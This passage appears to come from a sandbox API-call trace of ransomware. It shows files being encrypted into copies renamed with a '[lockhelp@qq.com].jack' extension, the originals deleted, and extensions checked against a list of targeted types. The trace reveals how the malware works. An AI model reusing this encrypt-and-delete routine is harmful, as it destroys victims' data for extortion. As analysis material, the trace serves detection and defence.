returned 1 [0198.726] CloseHandle (hObject=0x3ec) returned 1 [0198.726] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\header.bmp.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.726] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp")) returned 1 [0198.727] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0198.727] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0198.727] lstrlenW (lpString=".doc") returned 4 [0198.727] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0198.727] lstrlenW (lpString=".docx") returned 5 [0198.727] lstrcmpiW (lpString1=".docx", lpString2="r.bmp") returned -1 [0198.727] lstrlenW (lpString=".pdf") returned 4 [0198.727] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0198.727] lstrlenW (lpString=".xls") returned 4 [0198.727] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0198.727] lstrlenW (lpString=".xlsx") returned 5 [0198.727] lstrcmpiW (lpString1=".xlsx", lpString2="r.bmp") returned -1 [0198.727] lstrlenW (lpString=".ppt") returned 4 [0198.727] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0198.727] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0198.727] lstrlenW (lpString=".zip") returned 4 [0198.727] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0198.727] lstrlenW (lpString=".rar") returned 4 [0198.727] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0198.727] lstrlenW (lpString=".bz2") returned 4 [0198.727] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0198.727] lstrlenW (lpString=".7z") returned 3 [0198.728] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0198.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0198.728] lstrlenW (lpString=".dbf") returned 4 [0198.728] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0198.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0198.728] lstrlenW (lpString=".1cd") returned 4 [0198.728] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0198.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0198.728] lstrlenW (lpString=".jpg") returned 4 [0198.728] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0198.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0198.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0198.728] lstrlenW (lpString=".doc") returned 4 [0198.728] lstrcmpiW (lpString1=".doc", lpString2=".bmp") returned 1 [0198.728] lstrlenW (lpString=".docx") returned 5 [0198.728] lstrcmpiW (lpString1=".docx", lpString2="r.bmp") returned -1 [0198.728] lstrlenW (lpString=".pdf") returned 4 [0198.728] lstrcmpiW (lpString1=".pdf", lpString2=".bmp") returned 1 [0198.728] lstrlenW (lpString=".xls") returned 4 [0198.728] lstrcmpiW (lpString1=".xls", lpString2=".bmp") returned 1 [0198.728] lstrlenW (lpString=".xlsx") returned 5 [0198.728] lstrcmpiW (lpString1=".xlsx", lpString2="r.bmp") returned -1 [0198.728] lstrlenW (lpString=".ppt") returned 4 [0198.728] lstrcmpiW (lpString1=".ppt", lpString2=".bmp") returned 1 [0198.728] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0198.728] lstrlenW (lpString=".zip") returned 4 [0198.728] lstrcmpiW (lpString1=".zip", lpString2=".bmp") returned 1 [0198.729] lstrlenW (lpString=".rar") returned 4 [0198.729] lstrcmpiW (lpString1=".rar", lpString2=".bmp") returned 1 [0198.729] lstrlenW (lpString=".bz2") returned 4 [0198.729] lstrcmpiW (lpString1=".bz2", lpString2=".bmp") returned 1 [0198.729] lstrlenW (lpString=".7z") returned 3 [0198.729] lstrcmpiW (lpString1=".7z", lpString2="bmp") returned -1 [0198.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0198.729] lstrlenW (lpString=".dbf") returned 4 [0198.729] lstrcmpiW (lpString1=".dbf", lpString2=".bmp") returned 1 [0198.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0198.729] lstrlenW (lpString=".1cd") returned 4 [0198.729] lstrcmpiW (lpString1=".1cd", lpString2=".bmp") returned -1 [0198.729] lstrlenW (lpString="C:\\588bce7c90097ed212\\header.bmp") returned 32 [0198.729] lstrlenW (lpString=".jpg") returned 4 [0198.729] lstrcmpiW (lpString1=".jpg", lpString2=".bmp") returned 1 [0198.729] lstrcmpiW (lpString1=".xsd", lpString2=".jack") returned 1 [0198.729] lstrlenW (lpString="SetupUi.xsd") returned 11 [0198.729] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0198.729] GetFileSizeEx (in: hFile=0x3ec, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=30120) returned 1 [0198.729] CloseHandle (hObject=0x3ec) returned 1 [0198.730] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd")) returned 0x80 [0198.730] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.730] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0198.730] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.730] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.730] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0198.730] GetLastError () returned 0x0 [0198.730] ReadFile (in: hFile=0x3ec, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x75a8, lpOverlapped=0x0) returned 1 [0199.077] WriteFile (in: hFile=0x3f4, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x75b0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x75b0, lpOverlapped=0x0) returned 1 [0199.099] ReadFile (in: hFile=0x3ec, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.099] WriteFile (in: hFile=0x3f4, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xea, lpOverlapped=0x0) returned 1 [0199.100] SetEndOfFile (hFile=0x3f4) returned 1 [0199.100] CloseHandle (hObject=0x3f4) returned 1 [0199.106] SetFilePointerEx (in: hFile=0x3ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.106] SetEndOfFile (hFile=0x3ec) returned 1 [0199.107] CloseHandle (hObject=0x3ec) returned 1 [0199.107] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0199.108] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd")) returned 1 [0199.115] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0199.115] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0199.115] lstrlenW (lpString=".doc") returned 4 [0199.115] lstrcmpiW (lpString1=".doc", lpString2=".xsd") returned -1 [0199.115] lstrlenW (lpString=".docx") returned 5 [0199.115] lstrcmpiW (lpString1=".docx", lpString2="i.xsd") returned -1 [0199.115] lstrlenW (lpString=".pdf") returned 4 [0199.115] lstrcmpiW (lpString1=".pdf", lpString2=".xsd") returned -1 [0199.115] lstrlenW (lpString=".xls") returned 4 [0199.115] lstrcmpiW (lpString1=".xls", lpString2=".xsd") returned -1 [0199.115] lstrlenW (lpString=".xlsx") returned 5 [0199.115] lstrcmpiW (lpString1=".xlsx", lpString2="i.xsd") returned -1 [0199.115] lstrlenW (lpString=".ppt") returned 4 [0199.115] lstrcmpiW (lpString1=".ppt", lpString2=".xsd") returned -1 [0199.115] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0199.115] lstrlenW (lpString=".zip") returned 4 [0199.115] lstrcmpiW (lpString1=".zip", lpString2=".xsd") returned 1 [0199.115] lstrlenW (lpString=".rar") returned 4 [0199.115] lstrcmpiW (lpString1=".rar", lpString2=".xsd") returned -1 [0199.115] lstrlenW (lpString=".bz2") returned 4 [0199.115] lstrcmpiW (lpString1=".bz2", lpString2=".xsd") returned -1 [0199.115] lstrlenW (lpString=".7z") returned 3 [0199.115] lstrcmpiW (lpString1=".7z", lpString2="xsd") returned -1 [0199.115] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0199.115] lstrlenW (lpString=".dbf") returned 4 [0199.115] lstrcmpiW (lpString1=".dbf", lpString2=".xsd") returned -1 [0199.116] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0199.116] lstrlenW (lpString=".1cd") returned 4 [0199.116] lstrcmpiW (lpString1=".1cd", lpString2=".xsd") returned -1 [0199.116] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0199.116] lstrlenW (lpString=".jpg") returned 4 [0199.116] lstrcmpiW (lpString1=".jpg", lpString2=".xsd") returned -1 [0199.116] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0199.116] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0199.116] lstrlenW (lpString=".doc") returned 4 [0199.116] lstrcmpiW (lpString1=".doc", lpString2=".xsd") returned -1 [0199.116] lstrlenW (lpString=".docx") returned 5 [0199.116] lstrcmpiW (lpString1=".docx", lpString2="i.xsd") returned -1 [0199.116] lstrlenW (lpString=".pdf") returned 4 [0199.116] lstrcmpiW (lpString1=".pdf", lpString2=".xsd") returned -1 [0199.116] lstrlenW (lpString=".xls") returned 4 [0199.116] lstrcmpiW (lpString1=".xls", lpString2=".xsd") returned -1 [0199.116] lstrlenW (lpString=".xlsx") returned 5 [0199.116] lstrcmpiW (lpString1=".xlsx", lpString2="i.xsd") returned -1 [0199.116] lstrlenW (lpString=".ppt") returned 4 [0199.116] lstrcmpiW (lpString1=".ppt", lpString2=".xsd") returned -1 [0199.116] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0199.116] lstrlenW (lpString=".zip") returned 4 [0199.116] lstrcmpiW (lpString1=".zip", lpString2=".xsd") returned 1 [0199.116] lstrlenW (lpString=".rar") returned 4 [0199.116] lstrcmpiW (lpString1=".rar", lpString2=".xsd") returned -1 [0199.116] lstrlenW (lpString=".bz2") returned 4 [0199.116] lstrcmpiW (lpString1=".bz2", lpString2=".xsd") returned -1 [0199.117] lstrlenW (lpString=".7z") returned 3 [0199.117] lstrcmpiW (lpString1=".7z", lpString2="xsd") returned -1 [0199.117] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0199.117] lstrlenW (lpString=".dbf") returned 4 [0199.117] lstrcmpiW (lpString1=".dbf", lpString2=".xsd") returned -1 [0199.117] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0199.117] lstrlenW (lpString=".1cd") returned 4 [0199.117] lstrcmpiW (lpString1=".1cd", lpString2=".xsd") returned -1 [0199.117] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUi.xsd") returned 33 [0199.117] lstrlenW (lpString=".jpg") returned 4 [0199.117] lstrcmpiW (lpString1=".jpg", lpString2=".xsd") returned -1 [0199.117] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0199.117] lstrlenW (lpString="C2RHeartbeatConfig.xml") returned 22 [0199.117] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0199.118] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=4136) returned 1 [0199.118] CloseHandle (hObject=0x404) returned 1 [0199.118] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml")) returned 0x20 [0199.118] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.118] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0199.118] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.118] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.118] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0199.529] GetLastError () returned 0x0 [0199.529] ReadFile (in: hFile=0x404, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x1028, lpOverlapped=0x0) returned 1 [0199.547] WriteFile (in: hFile=0x41c, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x1030, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x1030, lpOverlapped=0x0) returned 1 [0199.549] ReadFile (in: hFile=0x404, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.549] WriteFile (in: hFile=0x41c, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x100, lpOverlapped=0x0) returned 1 [0199.549] SetEndOfFile (hFile=0x41c) returned 1 [0199.549] CloseHandle (hObject=0x41c) returned 1 [0199.550] SetFilePointerEx (in: hFile=0x404, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.550] SetEndOfFile (hFile=0x404) returned 1 [0199.551] CloseHandle (hObject=0x404) returned 1 [0199.551] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0199.552] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2rheartbeatconfig.xml")) returned 1 [0199.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0199.552] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0199.552] lstrlenW (lpString=".doc") returned 4 [0199.552] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.552] lstrlenW (lpString=".docx") returned 5 [0199.552] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0199.552] lstrlenW (lpString=".pdf") returned 4 [0199.552] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.552] lstrlenW (lpString=".xls") returned 4 [0199.552] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.553] lstrlenW (lpString=".xlsx") returned 5 [0199.553] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0199.553] lstrlenW (lpString=".ppt") returned 4 [0199.553] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0199.553] lstrlenW (lpString=".zip") returned 4 [0199.553] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.553] lstrlenW (lpString=".rar") returned 4 [0199.553] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.553] lstrlenW (lpString=".bz2") returned 4 [0199.553] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.553] lstrlenW (lpString=".7z") returned 3 [0199.553] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0199.553] lstrlenW (lpString=".dbf") returned 4 [0199.553] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0199.553] lstrlenW (lpString=".1cd") returned 4 [0199.553] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0199.553] lstrlenW (lpString=".jpg") returned 4 [0199.553] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0199.553] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0199.553] lstrlenW (lpString=".doc") returned 4 [0199.554] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.554] lstrlenW (lpString=".docx") returned 5 [0199.554] lstrcmpiW (lpString1=".docx", lpString2="g.xml") returned -1 [0199.554] lstrlenW (lpString=".pdf") returned 4 [0199.554] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.554] lstrlenW (lpString=".xls") returned 4 [0199.554] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.554] lstrlenW (lpString=".xlsx") returned 5 [0199.554] lstrcmpiW (lpString1=".xlsx", lpString2="g.xml") returned -1 [0199.554] lstrlenW (lpString=".ppt") returned 4 [0199.554] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0199.554] lstrlenW (lpString=".zip") returned 4 [0199.554] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.554] lstrlenW (lpString=".rar") returned 4 [0199.554] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.554] lstrlenW (lpString=".bz2") returned 4 [0199.554] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.554] lstrlenW (lpString=".7z") returned 3 [0199.554] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0199.554] lstrlenW (lpString=".dbf") returned 4 [0199.554] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0199.554] lstrlenW (lpString=".1cd") returned 4 [0199.554] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.554] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\C2RHeartbeatConfig.xml") returned 80 [0199.555] lstrlenW (lpString=".jpg") returned 4 [0199.555] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.555] lstrcmpiW (lpString1=".jpg", lpString2=".jack") returned 1 [0199.555] lstrlenW (lpString="Garden.jpg") returned 10 [0199.555] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0199.569] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=23871) returned 1 [0199.569] CloseHandle (hObject=0x420) returned 1 [0199.569] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg")) returned 0x20 [0199.569] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.569] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0199.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0199.570] lstrlenW (lpString=".doc") returned 4 [0199.570] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0199.570] lstrlenW (lpString=".docx") returned 5 [0199.570] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1 [0199.570] lstrlenW (lpString=".pdf") returned 4 [0199.570] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0199.570] lstrlenW (lpString=".xls") returned 4 [0199.570] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0199.570] lstrlenW (lpString=".xlsx") returned 5 [0199.570] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1 [0199.570] lstrlenW (lpString=".ppt") returned 4 [0199.570] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0199.570] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0199.571] lstrlenW (lpString=".zip") returned 4 [0199.571] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0199.571] lstrlenW (lpString=".rar") returned 4 [0199.571] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0199.571] lstrlenW (lpString=".bz2") returned 4 [0199.571] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0199.571] lstrlenW (lpString=".7z") returned 3 [0199.571] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0199.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0199.571] lstrlenW (lpString=".dbf") returned 4 [0199.571] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0199.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0199.571] lstrlenW (lpString=".1cd") returned 4 [0199.571] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0199.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0199.571] lstrlenW (lpString=".jpg") returned 4 [0199.571] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0199.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0199.571] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0199.571] lstrlenW (lpString=".doc") returned 4 [0199.571] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0199.571] lstrlenW (lpString=".docx") returned 5 [0199.571] lstrcmpiW (lpString1=".docx", lpString2="n.jpg") returned -1 [0199.571] lstrlenW (lpString=".pdf") returned 4 [0199.571] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0199.571] lstrlenW (lpString=".xls") returned 4 [0199.571] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0199.571] lstrlenW (lpString=".xlsx") returned 5 [0199.571] lstrcmpiW (lpString1=".xlsx", lpString2="n.jpg") returned -1 [0199.572] lstrlenW (lpString=".ppt") returned 4 [0199.572] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0199.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0199.572] lstrlenW (lpString=".zip") returned 4 [0199.572] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0199.572] lstrlenW (lpString=".rar") returned 4 [0199.572] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0199.572] lstrlenW (lpString=".bz2") returned 4 [0199.572] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0199.572] lstrlenW (lpString=".7z") returned 3 [0199.572] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0199.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0199.572] lstrlenW (lpString=".dbf") returned 4 [0199.572] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0199.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0199.572] lstrlenW (lpString=".1cd") returned 4 [0199.572] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0199.572] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 68 [0199.572] 